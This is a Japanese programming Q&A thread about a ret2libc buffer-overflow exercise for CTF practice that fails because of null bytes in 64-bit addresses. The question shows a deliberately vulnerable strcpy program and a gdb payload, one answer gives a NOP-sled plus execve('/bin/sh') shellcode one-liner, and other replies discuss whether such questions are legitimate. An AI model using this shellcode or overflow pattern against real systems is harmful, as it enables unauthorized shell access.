アドレスに0x00を含む時にret2libcできない

ret2libc 攻撃を実験してみようと思い、SSPとASLRを無効にして、バッファオーバーフローによりリターンアドレスをsystem()へのアドレスに書き換え、引数を/bin/shにしようとしました。
しかし、system()アドレスが0x0000......だったため引数を指定できませんでした。
実行環境のメモリアドレスは8バイトあるため、全てが0x0000......で表されています。このような場合に、上手くsystem(/bin/sh)を実行する方法を教えて下さい。

補足
このプログラムを、gdbにおいて、
r perl -e 'print "A"x128,"B"x8,"(system関数のアドレス)","(exit関数のアドレス)", "(環境変数を用いた　文字列/bin/sh　へのアドレス)"'
で実行した所、system関数のアドレスが \x--\x.......\x00\x00となってしまうため、strcpyが文字列として認識するのが入力値のsystem関数のアドレスの６バイト目までとなってしまい、system関数の引数部分を書き換えられない、という意味です。うまく伝わればいいのですが・・・
また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。

この実験で使用したコードは以下の通りです。

C
1#include <stdio.h>
2#include <string.h>
3
4void bug(char *arg1){
5	char name[128];
6	strcpy(name,arg1);
7	printf("Hello %s\n", name);
8}
9
10int main(int argc, char **argv){
11	if(argc < 2){
12		printf("Usage: %s <your name>\n", argv[0]);
13		return 0;
14	}
15	bug(argv[1]);
16	return 0;
17}
18
19

ubuntu14.04 64bitで実行しました。

行動規範の内容に同意します

回答4件

NXも無効であれば、ret2libcではなくargv[1]に入っているshellcodeの移動した方が簡単気がします。例えば、execve(/bin/sh)のshellcodeを書き込んで、RETをそのアドレスに書き換えてみればいかがでしょうか？

こういう感じで、nop-sledのサイズとoffsetを自分で調整してみてください。

bash
1$ perl -e 'print "\x90"x53,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","<little-endianでargv[1]のおよそのアドレス>"x15'

DEPとASLRがある場合、ROP shellcodeを書くしかないです。

※ CTF頑張ってください！

投稿2019/01/25 10:49

編集2019/01/25 10:53

maratto

総合スコア24

somu

2019/01/25 11:45

回答ありがとうございます！とても参考になります。

maratto

2019/01/25 13:05

英語なんですが、この攻撃を最初に解説した記事を読むのがお勧めです。 http://phrack.org/issues/49/14.html

somu

2019/02/22 12:28

ありがとうございます。読ませてもらいます。

行動規範の内容に同意します

また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。

全く意味がないですね
あなたが嘘を言ってないという証明はできるでしょうか

投稿2019/01/22 21:20

y_waiwai

総合スコア87774

somu

2019/01/22 21:33

全く実用的でなく、初歩的な内容なので理解されると思ったんですが。残念ですね。

y_waiwai

2019/01/22 21:35

初歩的な内容だと思うならご自分で解決しましょう。他人を巻き込んではいけません

somu

2019/01/22 21:47

実用といった視点から見ると環境的にも初歩的なのであって初心者の自分が悩んでるから質問したんです。ここは質問サイトですよね？

y_waiwai

2019/01/22 21:54

犯罪につながるような質門はこういう公共の場ではするものではありません。覚えておきますよう

somu

2019/01/22 22:01 編集

ASLRさえない環境でのとても単純な攻撃を犯罪に使えるかもしれないと捉えることが前提なんですね。失礼しました。

y_waiwai

2019/01/22 22:13

> また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。あなた自身、自覚していることですが。

somu

2019/01/22 22:37 編集

1人目の回答者さんに答えたつもりだったんですが... しかし1人目の方も気にされているので、そう捉える人がいるのを考えると確かにここでするべき質問ではなかったですね。失礼しました。自分で解決してみます。

maratto

2019/01/25 11:01

somuさん、ご遠慮なく聞いていてください。日本のセキュリティ人材の不足が世界に比べるともっとも激しくて、あなたのような好奇心を持った研究者が減るとサイバーセキュリティ大臣みたいなパソコンすら利用していないお爺ちゃんしか残らないのですから。

pmakino

2019/01/27 09:04

somuさん、私も遠慮無く聞いていいと思います。「ASLRさえない環境でのとても単純な攻撃を犯罪に使えるかもしれないと捉え」て言いがかりをつけてくるようなような判断力の低い人の話を真に受ける必要はありません。 CTF頑張ってください。

行動規範の内容に同意します

ベストアンサー

しかし、system()アドレスが0x0000......だったため引数を指定できませんでした。

ちょっと意味を掴みかねていますが、先のご質問 #170151 - gdbのSIGSEGVについての延長でしょうか？
もし、先の質問内容中のコードperl -e 'print "A"x144' に関連して、戻り先アドレスとして値に0を埋めたいと言うことであれば、perlの文字列でC言語のように16進数指定や\0指定もできるので、それを利用すれば所望の結果を得られると思います。

bash
1# 'A'を2文字 + '\0'(0x00) + '0'を3文字
2$ perl -e 'print "A"x2 . "\0" . "\x30"x3'  | od -t xC
30000000 41 41 00 30 30 30
40000006
5
6# 'A'を2文字 + 0x00, 0x01, 0x02 + '0'を3文字
7$ perl -e 'print "A"x2 . "\x00\x01\x02" . "\x30"x3' | od -t xC
80000000 41 41 00 01 02 30 30 30
90000010

純粋に技術的な興味からくる実験だとは思いますが、最終的には攻撃手法の解説やヘルプになってしまう恐れはありますので、回答としてはこの辺にしておきます。そもそも回答として外していたらごめんなさい。

**質問者さんの補足を受けて追記しました：**2019-01-23 09:55

strcpyが文字列として認識するのが入力値のsystem関数のアドレスの６バイト目までとなってしまい

つまりはperl -e ...での実行結果をコマンドライン文字列としてmainで受け取っていて、その生成されたコマンドラインオプションの文字列が途中で'\0'を含んでしまっているので、strcpyで途中までしか取り込めない、と言うことでしたか。理解しました。

実験の主旨からするとコマンドラインから指定するのが必須要件ではないはずです。perlのスクリプトを使っているのは「便利だから」程度の理由だと思いますが、プログラム中で定数で指定してしまっても実験はできるはずですし、あくまで「外部から入力したい」と言うことであればパラメータを渡す方法はいくらでも考えられます。※どのような方法があるかは課題としてご自分で考えてみてください。

また、この実験はCTFに参加してみたく行ったものなので、悪意ある攻撃のためではありません。

個人的には低レイヤーでかつ、セキュリティ系に興味を覚える方は少なく、（良い意味での）貴重な将来の人材と成り得るとは思っているので、若干の警戒はあるものの全面的に疑っている訳ではありません。ただ、別回答にもありましたが、どんな内容が悪用されるか分かりません。初心者レベルの攻撃でも、例えば子供でも刃物を持ってうろついていたら保護されるように、初心者レベルのプログラムでも意図した攻撃や誤用で罪になることも考えられます。

ご存知だとは思いますが：
警視庁 - 不正指令電磁的記録に関する罪

今に始まったことではありませんが、teratailをはじめ、公共の目にとまりやすいWEBサイトでそのような情報を共有すること自体がリスクになっているので、慎重にならざるを得ません。

投稿2019/01/22 19:28

編集2019/01/23 00:56

dodox86

総合スコア9183

C言語 (やその仲間) では、文字列は配列の一種です。配列というのは、メモリ上の連続した範囲に同じ型のデータがならんでいるもののことです。

ただし、配列を文字列として扱う際には特別な約束ごとがあります。「\0があったらそこで終了とみなす」というものです。strcpyなどのstr...系のC標準ライブラリ関数は、配列をそのようなものとして扱います。

今回の場合、メモリ上の特定の範囲を配列として扱いたいだけで、文字列を扱いたいわけではないですから、str...系の関数は使えません。似た関数で (文字列とは限らない) 配列として扱うmem...系の関数があります。たとえばmemcpyなどですね。調べてみてください。

なお、システムに設計時の意図と異なる動作をさせる手法について調査や実験をすることは問題ありません。
それを応用して他人の権利を侵害したり財物を窃取したりすれば犯罪ですが、そうでなければ学習・研究の一環です。またそうした調査・実験をすることで、意図しない動作をさせないシステムのつくりかたを学ぶこともできます (もちろん、他人が現に運用しているシステムで実験してはいけません)。

「攻撃」といった言葉に過剰反応して本来できたはずの回答を控えたり、質問したこと自体を非難するのはやめたほうがいいです。(たとえですが) アルコール発酵の仕組みについてどこかの質問サイトで質問した人に「酒税法にひっかかるぞ」と言っているようなもので、的外れです。

投稿2019/01/23 01:18

編集2019/01/23 01:23